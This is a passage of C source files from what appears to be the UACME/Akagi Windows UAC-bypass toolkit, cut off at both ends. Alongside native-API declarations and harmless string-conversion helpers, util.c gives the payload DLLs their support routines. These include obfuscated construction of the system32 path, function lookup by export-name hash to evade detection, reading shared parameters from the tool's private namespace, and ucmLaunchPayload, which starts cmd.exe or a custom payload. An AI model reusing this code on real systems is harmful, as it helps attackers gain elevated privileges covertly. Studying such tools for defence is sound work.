\nNTAPI \nRtlGetActiveActivationContext(\n _Out_ PACTIVATION_CONTEXT *ActivationContext);\n\nNTSYSAPI\nBOOLEAN \nNTAPI \nRtlIsActivationContextActive(\n _In_ PACTIVATION_CONTEXT ActivationContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nRtlQueryActivationContextApplicationSettings(\n _In_opt_ DWORD dwFlags,\n _In_opt_ HANDLE hActCtx,\n _In_opt_ PCWSTR settingsNameSpace,\n _In_ PCWSTR settingName,\n _Out_writes_bytes_to_opt_(dwBuffer, *pdwWrittenOrRequired) PWSTR pvBuffer,\n _In_ SIZE_T dwBuffer,\n _Out_opt_ SIZE_T *pdwWrittenOrRequired);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlFindActivationContextSectionString(\n _In_ ULONG Flags,\n _In_opt_ CONST GUID *ExtensionGuid,\n _In_ ULONG SectionId,\n _In_ PCUNICODE_STRING StringToFind,\n _Inout_ PACTIVATION_CONTEXT_SECTION_KEYED_DATA ReturnedData);\n\n//\n// NTSXS_RTL HEADER END\n//\n\n#pragma warning(pop)\n\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif NTSXS_RTL\n"
},
{
"path": "Source/Shared/rtltypes.h",
"content": "#pragma once\n\n#ifndef _WCHAR_T_DEFINED\ntypedef unsigned short wchar_t;\n#define _WCHAR_T_DEFINED\n#endif /* _WCHAR_T_DEFINED */\n\n#ifndef _SIZE_T_DEFINED\n#ifdef _WIN64\ntypedef unsigned __int64 size_t;\n#else /* _WIN64 */\ntypedef __w64 unsigned int size_t;\n#endif /* _WIN64 */\n#define _SIZE_T_DEFINED\n#endif /* _SIZE_T_DEFINED */\n\n__forceinline char locase_a(char c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline wchar_t locase_w(wchar_t c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline char byteabs(char x) {\n\tif (x < 0)\n\t\treturn -x;\n\treturn x;\n}\n\n__forceinline int _isdigit_a(char x) {\n\treturn ((x >= '0') && (x <= '9'));\n}\n\n__forceinline int _isdigit_w(wchar_t x) {\n\treturn ((x >= L'0') && (x <= L'9'));\n}\n"
},
{
"path": "Source/Shared/shared.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2021\n*\n* TITLE: SHARED.H\n*\n* VERSION: 3.56\n*\n* DATE: 26 July 2021\n*\n* Shared include header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n//disable nonmeaningful warnings.\n#pragma warning(push)\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n\n#include \n#include \n#include \"ntos\\ntos.h\"\n#include \"ntos\\ntbuilds.h\"\n\n#define _NTDEF_\n#include \n#undef _NTDEF_\n\n#include \"minirtl.h\"\n#include \"_filename.h\"\n#include \"util.h\"\n#include \"windefend.h\"\n#include \"consts.h\"\n\n#if defined(__cplusplus)\n#include \n#endif\n\n#pragma warning(pop)\n"
},
{
"path": "Source/Shared/strtoi.c",
"content": "#include \"rtltypes.h\"\n\nint strtoi_a(char *s)\n{\n\tint\t\ta = 0, sign;\n\tchar\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase '-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase '+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10) + (c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n\nint strtoi_w(wchar_t *s)\n{\n\tint\t\t\ta = 0, sign;\n\twchar_t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase L'-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase L'+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n"
},
{
"path": "Source/Shared/strtoul.c",
"content": "#include \"rtltypes.h\"\n\nunsigned long strtoul_a(char *s)\n{\n\tunsigned long\ta = 0;\n\tchar\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10)+(c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n\nunsigned long strtoul_w(wchar_t *s)\n{\n\tunsigned long\ta = 0;\n\twchar_t\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n"
},
{
"path": "Source/Shared/u64tohex.c",
"content": "#include \"rtltypes.h\"\n\nsize_t u64tohex_a(unsigned long long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c=0; c<16; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n\nsize_t u64tohex_w(unsigned long long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c = 0; c<16; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n"
},
{
"path": "Source/Shared/u64tostr.c",
"content": "#include \"rtltypes.h\"\n\nsize_t u64tostr_a(unsigned long long x, char *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t u64tostr_w(unsigned long long x, wchar_t *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
},
{
"path": "Source/Shared/ultohex.c",
"content": "#include \"rtltypes.h\"\n\nsize_t ultohex_a(unsigned long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n\nsize_t ultohex_w(unsigned long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n"
},
{
"path": "Source/Shared/ultostr.c",
"content": "#include \"rtltypes.h\"\n\nsize_t ultostr_a(unsigned long x, char *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t ultostr_w(unsigned long x, wchar_t *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
},
{
"path": "Source/Shared/util.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n* TITLE: UTIL.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* Global support routines file shared between payload dlls.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#undef _TRACE_CALL\n\n#include \"shared.h\"\n\n/*\n* ucmxHeapAlloc\n*\n* Purpose:\n*\n* Wrapper for RtlAllocateHeap.\n*\n*/\nPVOID ucmxHeapAlloc(\n _In_ SIZE_T NumberOfBytes\n)\n{\n return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap,\n HEAP_ZERO_MEMORY,\n NumberOfBytes);\n}\n\n/*\n* ucmxHeapFree\n*\n* Purpose:\n*\n* Wrapper for RtlFreeHeap.\n*\n*/\nBOOLEAN ucmxHeapFree(\n _In_ PVOID BaseAddress\n)\n{\n return RtlFreeHeap(NtCurrentPeb()->ProcessHeap,\n 0,\n BaseAddress);\n}\n\n/*\n* ucmIsProcess32bit\n*\n* Purpose:\n*\n* Return TRUE if given process is under WOW64, FALSE otherwise.\n*\n*/\nBOOLEAN ucmIsProcess32bit(\n _In_ HANDLE hProcess\n)\n{\n NTSTATUS status;\n PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n\n if (hProcess == NULL) {\n return FALSE;\n }\n\n //query if this is wow64 process\n RtlSecureZeroMemory(&pebi, sizeof(pebi));\n pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);\n if (NT_SUCCESS(status)) {\n return (pebi.IsWow64Process == 1);\n }\n return FALSE;\n}\n\n/*\n* ucmxQuerySystemDirectory\n*\n* Purpose:\n*\n* Query system directory full path including slash (with wow64 support).\n*\n*/\nVOID ucmxQuerySystemDirectory(\n _Inout_ LPWSTR lpSystemDirectory,\n _In_ BOOLEAN CheckWow64)\n{\n WCHAR szSystem32Prep[] = { L'\\\\', L's', L'y', L's', 0 };\n WCHAR szSystem32Final[] = { L't', L'e', L'm', L'3', L'2', L'\\\\', 0 };\n WCHAR szWow64Final[] = { L'w', L'o', L'w', L'6', L'4', L'\\\\', 0 };\n\n _strcpy(lpSystemDirectory, USER_SHARED_DATA->NtSystemRoot);\n _strcat(lpSystemDirectory, szSystem32Prep);\n\n if (CheckWow64) {\n if (ucmIsProcess32bit(NtCurrentProcess())) {\n _strcat(lpSystemDirectory, szWow64Final);\n }\n else {\n _strcat(lpSystemDirectory, szSystem32Final);\n }\n }\n else {\n _strcat(lpSystemDirectory, szSystem32Final);\n }\n}\n\n/*\n* ucmBinTextEncode\n*\n* Purpose:\n*\n* Create pseudo random string from UI64 value.\n*\n*/\nVOID ucmBinTextEncode(\n _In_ unsigned __int64 x,\n _Inout_ wchar_t* s\n)\n{\n char tbl[64];\n char c = 0;\n int p;\n\n tbl[62] = '-';\n tbl[63] = '_';\n\n for (c = 0; c < 26; ++c)\n {\n tbl[c] = 'A' + c;\n tbl[26 + c] = 'a' + c;\n if (c < 10)\n tbl[52 + c] = '0' + c;\n }\n\n for (p = 0; p < 13; ++p)\n {\n c = x & 0x3f;\n x >>= 5;\n *s = (wchar_t)tbl[c];\n ++s;\n }\n\n *s = 0;\n}\n\n/*\n* ucmGenerateSharedObjectName\n*\n* Purpose:\n*\n* Create pseudo random object name from it ID.\n*\n*/\nVOID ucmGenerateSharedObjectName(\n _In_ WORD ObjectId,\n _Inout_ LPWSTR lpBuffer\n)\n{\n ULARGE_INTEGER value;\n\n value.LowPart = MAKELONG(\n MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION),\n MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR));\n\n value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId);\n\n ucmBinTextEncode(value.QuadPart, lpBuffer);\n}\n\n/*\n* ucmxCreateBoundaryDescriptorSID\n*\n* Purpose:\n*\n* Create special SID to access isolated namespace.\n*\n*/\nPSID ucmxCreateBoundaryDescriptorSID(\n SID_IDENTIFIER_AUTHORITY* SidAuthority,\n UCHAR SubAuthorityCount,\n ULONG* SubAuthorities\n)\n{\n ULONG i;\n PSID pSid;\n\n pSid = ucmxHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount));\n if (pSid) {\n\n if (NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount))) {\n\n for (i = 0; i < SubAuthorityCount; i++)\n *RtlSubAuthoritySid(pSid, i) = SubAuthorities[i];\n\n return pSid;\n\n }\n ucmxHeapFree(pSid);\n }\n return NULL;\n}\n\n/*\n* ucmOpenAkagiNamespace\n*\n* Purpose:\n*\n* Open Akagi private namespace.\n*\n* Use NtClose on returned handle.\n*\n*/\nHANDLE ucmOpenAkagiNamespace(\n VOID\n)\n{\n HANDLE hNamespace = NULL;\n HANDLE hBoundary = NULL;\n PSID pWorldSid;\n SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY;\n\n UNICODE_STRING usName;\n OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0);\n\n ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0 };\n WCHAR szBoundaryDescriptorName[128];\n\n RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName));\n ucmGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName);\n RtlInitUnicodeString(&usName, szBoundaryDescriptorName);\n\n do {\n //\n // Create and assign boundary descriptor.\n //\n hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);\n if (hBoundary == NULL)\n break;\n\n pWorldSid = ucmxCreateBoundaryDescriptorSID(\n &SidWorldAuthority,\n 1,\n SubAuthoritiesWorld);\n\n if (pWorldSid == NULL)\n break;\n\n if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {\n RtlFreeSid(pWorldSid);\n break;\n }\n\n if (!NT_SUCCESS(NtOpenPrivateNamespace(\n &hNamespace,\n MAXIMUM_ALLOWED,\n &obja,\n hBoundary)))\n {\n break;\n }\n\n } while (FALSE);\n\n if (hBoundary) RtlDeleteBoundaryDescriptor(hBoundary);\n\n return hNamespace;\n}\n\n/*\n* ucmReadSharedParameters\n*\n* Purpose:\n*\n* Read shared parameters from Akagi.\n*\n* Return TRUE on success, FALSE otherwise.\n*\n*/\n_Success_(return == TRUE)\nBOOL ucmReadSharedParameters(\n _Out_ UACME_PARAM_BLOCK * SharedParameters\n)\n{\n BOOL bResult = FALSE;\n ULONG Crc32;\n HANDLE hNamespace = NULL, hSection = NULL;\n PVOID SectionBuffer = NULL;\n SIZE_T ViewSize = PAGE_SIZE;\n\n UNICODE_STRING usName;\n OBJECT_ATTRIBUTES obja;\n\n UACME_PARAM_BLOCK sharedParameters;\n WCHAR szSectionName[128];\n\n do {\n\n hNamespace = ucmOpenAkagiNamespace();\n if (hNamespace == NULL)\n break;\n\n RtlSecureZeroMemory(&szSectionName, sizeof(szSectionName));\n ucmGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szSectionName);\n RtlInitUnicodeString(&usName, szSectionName);\n\n InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL);\n if (NT_SUCCESS(NtOpenSection(&hSection, SECTION_ALL_ACCESS, &obja))) {\n if (NT_SUCCESS(NtMapViewOfSection(\n hSection,\n NtCurrentProcess(),\n &SectionBuffer,\n 0,\n PAGE_SIZE,\n NULL,\n &ViewSize,\n ViewUnmap,\n MEM_TOP_DOWN,\n PAGE_READONLY)))\n {\n RtlSecureZeroMemory(&sharedParameters, sizeof(UACME_PARAM_BLOCK));\n RtlCopyMemory(&sharedParameters, SectionBuffer, sizeof(UACME_PARAM_BLOCK));\n NtUnmapViewOfSection(NtCurrentProcess(), hSection);\n\n //\n // Validate data.\n //\n Crc32 = sharedParameters.Crc32;\n sharedParameters.Crc32 = 0;\n if (Crc32 == RtlComputeCrc32(0, &sharedParameters, sizeof(UACME_PARAM_BLOCK))) {\n sharedParameters.Crc32 = Crc32;\n RtlCopyMemory(SharedParameters, &sharedParameters, sizeof(UACME_PARAM_BLOCK));\n bResult = TRUE;\n }\n }\n NtClose(hSection);\n }\n NtClose(hNamespace);\n\n } while (FALSE);\n\n return bResult;\n}\n\n/*\n* ucmSetCompletion\n*\n* Purpose:\n*\n* Notify Akagi about task completion.\n*\n*/\nVOID ucmSetCompletion(\n _In_ LPWSTR lpEvent\n)\n{\n HANDLE hEvent = NULL, hNamespace = NULL;\n UNICODE_STRING usName;\n OBJECT_ATTRIBUTES obja;\n\n hNamespace = ucmOpenAkagiNamespace();\n if (hNamespace) {\n\n RtlInitUnicodeString(&usName, lpEvent);\n InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL);\n if (NT_SUCCESS(NtOpenEvent(&hEvent, EVENT_ALL_ACCESS, &obja))) {\n NtSetEvent(hEvent, NULL);\n NtClose(hEvent);\n }\n NtClose(hNamespace);\n }\n}\n\n/*\n* ucmPrivilegeEnabled\n*\n* Purpose:\n*\n* Tests if the given token has the given privilege enabled/enabled by default.\n*\n*/\nBOOLEAN ucmPrivilegeEnabled(\n _In_ HANDLE hToken,\n _In_ ULONG Privilege\n)\n{\n NTSTATUS status;\n PRIVILEGE_SET Privs;\n BOOLEAN bResult = FALSE;\n\n Privs.Control = PRIVILEGE_SET_ALL_NECESSARY;\n Privs.PrivilegeCount = 1;\n Privs.Privilege[0].Luid.LowPart = Privilege;\n Privs.Privilege[0].Luid.HighPart = 0;\n Privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n status = NtPrivilegeCheck(hToken, &Privs, &bResult);\n RtlSetLastWin32Error(RtlNtStatusToDosError(status));\n\n return bResult;\n}\n\n/*\n* ucmFormatTimeOut\n*\n* Purpose:\n*\n* Translates a Win32 style timeout to an NT relative timeout.\n*\n*/\nPLARGE_INTEGER ucmFormatTimeOut(\n _Out_ PLARGE_INTEGER TimeOut,\n _In_ DWORD Milliseconds\n)\n{\n if ((LONG)Milliseconds == -1) {\n return(NULL);\n }\n TimeOut->QuadPart = UInt32x32To64(Milliseconds, 10000);\n TimeOut->QuadPart *= -1;\n return TimeOut;\n}\n\n/*\n* ucmSleep\n*\n* Purpose:\n*\n* Win32 Sleep replacement.\n*\n*/\nVOID ucmSleep(\n _In_ DWORD Miliseconds\n)\n{\n LARGE_INTEGER liDueTime;\n\n if (Miliseconds == INFINITE) {\n liDueTime.QuadPart = 0x8000000000000000;\n }\n else {\n ucmFormatTimeOut(&liDueTime, Miliseconds);\n }\n NtDelayExecution(FALSE, &liDueTime);\n}\n\n/*\n* ucmCreateSyncMutant\n*\n* Purpose:\n*\n* Create sync mutex.\n*\n*/\nNTSTATUS ucmCreateSyncMutant(\n _Out_ PHANDLE phMutant\n)\n{\n UNICODE_STRING usName;\n OBJECT_ATTRIBUTES obja;\n\n WCHAR szObjectName[256];\n WCHAR szName[128];\n\n RtlSecureZeroMemory(&szName, sizeof(szName));\n _strcpy(szObjectName, L\"\\\\BaseNamedObjects\\\\\");\n ucmGenerateSharedObjectName(FUBUKI_SYNC_MUTEX_ID, szName);\n _strcat(szObjectName, szName);\n\n RtlInitUnicodeString(&usName, szObjectName);\n InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n return NtCreateMutant(phMutant, MUTANT_ALL_ACCESS, &obja, FALSE);\n}\n\n/*\n* ucmGetHashForString\n*\n* Purpose:\n*\n* Calculates specific hash for string.\n*\n*/\nDWORD ucmGetHashForString(\n _In_ char* s\n)\n{\n DWORD h = 0;\n\n while (*s != 0) {\n h ^= *s;\n h = RotateLeft32(h, 3) + 1;\n s++;\n }\n\n return h;\n}\n\n/*\n* ucmGetProcedureAddressByHash\n*\n* Purpose:\n*\n* Return pointer to function in dll from name hash value.\n*\n*/\nLPVOID ucmGetProcedureAddressByHash(\n _In_ PVOID ImageBase,\n _In_ DWORD ProcedureHash\n)\n{\n DWORD i;\n ULONG sz = 0;\n\n IMAGE_DOS_HEADER* DosHeader;\n IMAGE_EXPORT_DIRECTORY* Exports;\n PDWORD Names, Functions;\n PWORD Ordinals;\n\n DWORD_PTR FunctionPtr;\n\n DosHeader = (IMAGE_DOS_HEADER*)ImageBase;\n\n Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase,\n TRUE,\n IMAGE_DIRECTORY_ENTRY_EXPORT,\n &sz);\n\n if (Exports == NULL)\n return NULL;\n\n Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);\n Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals);\n Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions);\n\n for (i = 0; i < Exports->NumberOfNames; i++) {\n if (ucmGetHashForString((char*)((PBYTE)DosHeader + Names[i])) == ProcedureHash) {\n FunctionPtr = Functions[Ordinals[i]];\n return (PBYTE)ImageBase + FunctionPtr;\n }\n }\n\n return NULL;\n}\n\n/*\n* ucmGetStartupInfo\n*\n* Purpose:\n*\n* Reimplemented GetStartupInfoW.\n*\n*/\nVOID ucmGetStartupInfo(\n _In_ LPSTARTUPINFOW lpStartupInfo\n)\n{\n PRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n\n if (lpStartupInfo == NULL) {\n return;\n }\n\n ProcessParameters = NtCurrentPeb()->ProcessParameters;\n\n lpStartupInfo->cb = sizeof(*lpStartupInfo);\n lpStartupInfo->lpReserved = (LPWSTR)ProcessParameters->ShellInfo.Buffer;\n lpStartupInfo->lpDesktop = (LPWSTR)ProcessParameters->DesktopInfo.Buffer;\n lpStartupInfo->lpTitle = (LPWSTR)ProcessParameters->WindowTitle.Buffer;\n lpStartupInfo->dwX = ProcessParameters->StartingX;\n lpStartupInfo->dwY = ProcessParameters->StartingY;\n lpStartupInfo->dwXSize = ProcessParameters->CountX;\n lpStartupInfo->dwYSize = ProcessParameters->CountY;\n lpStartupInfo->dwXCountChars = ProcessParameters->CountCharsX;\n lpStartupInfo->dwYCountChars = ProcessParameters->CountCharsY;\n lpStartupInfo->dwFillAttribute = ProcessParameters->FillAttribute;\n lpStartupInfo->dwFlags = ProcessParameters->WindowFlags;\n lpStartupInfo->wShowWindow = (WORD)ProcessParameters->ShowWindowFlags;\n lpStartupInfo->cbReserved2 = ProcessParameters->RuntimeData.Length;\n lpStartupInfo->lpReserved2 = (LPBYTE)ProcessParameters->RuntimeData.Buffer;\n\n if (lpStartupInfo->dwFlags & (STARTF_USESTDHANDLES | STARTF_USEHOTKEY)) {\n lpStartupInfo->hStdInput = ProcessParameters->StandardInput;\n lpStartupInfo->hStdOutput = ProcessParameters->StandardOutput;\n lpStartupInfo->hStdError = ProcessParameters->StandardError;\n }\n}\n\n/*\n* ucmExpandEnvironmentStrings\n*\n* Purpose:\n*\n* Reimplemented ExpandEnvironmentStrings.\n*\n*/\nDWORD ucmExpandEnvironmentStrings(\n _In_ LPCWSTR lpSrc,\n _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,\n _In_ DWORD nSize\n)\n{\n NTSTATUS Status;\n SIZE_T SrcLength = 0, ReturnLength = 0, DstLength = (SIZE_T)nSize;\n\n if (lpSrc) {\n SrcLength = _strlen(lpSrc);\n }\n\n Status = RtlExpandEnvironmentStrings(\n NULL,\n (PWSTR)lpSrc,\n SrcLength,\n (PWSTR)lpDst,\n DstLength,\n &ReturnLength);\n\n if ((NT_SUCCESS(Status)) || (Status == STATUS_BUFFER_TOO_SMALL)) {\n\n if (ReturnLength <= MAXDWORD32)\n return (DWORD)ReturnLength;\n\n Status = STATUS_UNSUCCESSFUL;\n }\n RtlSetLastWin32Error(RtlNtStatusToDosError(Status));\n return 0;\n}\n\n#define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024)\n\n/*\n* ucmGetSystemInfo\n*\n* Purpose:\n*\n* Returns buffer with system information by given InfoClass.\n*\n* Returned buffer must be freed with HeapFree after usage.\n*\n*/\nPVOID ucmGetSystemInfo(\n _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass\n)\n{\n PVOID buffer = NULL;\n ULONG bufferSize = PAGE_SIZE;\n NTSTATUS ntStatus;\n ULONG returnedLength = 0;\n\n buffer = ucmxHeapAlloc((SIZE_T)bufferSize);\n if (buffer == NULL)\n return NULL;\n\n while ((ntStatus = NtQuerySystemInformation(\n SystemInformationClass,\n buffer,\n bufferSize,\n &returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)\n {\n ucmxHeapFree(buffer);\n bufferSize *= 2;\n\n if (bufferSize > SI_MAX_BUFFER_LENGTH)\n return NULL;\n\n buffer = ucmxHeapAlloc((SIZE_T)bufferSize);\n if (buffer == NULL)\n return NULL;\n }\n\n if (NT_SUCCESS(ntStatus)) {\n return buffer;\n }\n\n if (buffer)\n ucmxHeapFree(buffer);\n\n return NULL;\n}\n\n/*\n* ucmLaunchPayload\n*\n* Purpose:\n*\n* Run payload (by default cmd.exe from system32)\n*\n*/\nBOOL ucmLaunchPayload(\n _In_opt_ LPWSTR pszPayload,\n _In_opt_ DWORD cbPayload)\n{\n BOOL bResult = FALSE, bCommandLineAllocated = FALSE;\n WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line\n WCHAR sysdir[MAX_PATH + 1]; //process working directory\n STARTUPINFO startupInfo;\n PROCESS_INFORMATION processInfo;\n\n DWORD dwCreationFlags = CREATE_NEW_CONSOLE;\n\n LPWSTR lpApplicationName = NULL, lpCommandLine = NULL;\n SIZE_T memIO;\n\n\n //\n // Query working directory.\n //\n RtlSecureZeroMemory(sysdir, sizeof(sysdir));\n ucmxQuerySystemDirectory(sysdir, TRUE);\n\n //\n // Query startup info from parent.\n //\n RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n startupInfo.cb = sizeof(startupInfo);\n ucmGetStartupInfo(&startupInfo);\n\n //\n // Determine what we want to execute, custom parameter or default cmd.exe\n //\n if (pszPayload && cbPayload) {\n\n //\n // We can use custom payload, copy it to internal buffer.\n //\n memIO = PAGE_SIZE + (SIZE_T)cbPayload;\n\n lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO);\n\n if (lpCommandLine) {\n\n dwCreationFlags = 0;\n bCommandLineAllocated = TRUE;\n\n RtlCopyMemory(lpCommandLine,\n pszPayload,\n cbPayload);\n\n }\n }\n else {\n\n //\n // Default cmd.exe should be started.\n //\n RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));\n _strcpy(cmdbuf, sysdir);\n _strcat(cmdbuf, L\"cmd.exe\");\n\n lpApplicationName = cmdbuf;\n lpCommandLine = NULL;\n bCommandLineAllocated = FALSE;\n }\n\n startupInfo.dwFlags = STARTF_USESHOWWINDOW;\n startupInfo.wShowWindow = SW_SHOW;\n\n RtlSecureZeroMemory(&processInfo, sizeof(processInfo));\n\n#ifdef _TRACE_CALL\n OutputDebugString(L\"CreateProcessAsUser\\r\\n\");\n#endif\n\n //\n // Launch payload.\n //\n bResult = CreateProcessAsUser(NULL,\n lpApplicationName,\n lpCommandLine,\n NULL,\n NULL,\n FALSE,\n dwCreationFlags,\n NULL,\n sysdir,\n &startupInfo,\n &processInfo);\n\n if (bResult) {\n //\n // We don't need these handles, close them.\n //\n NtClose(processInfo.hProcess);\n 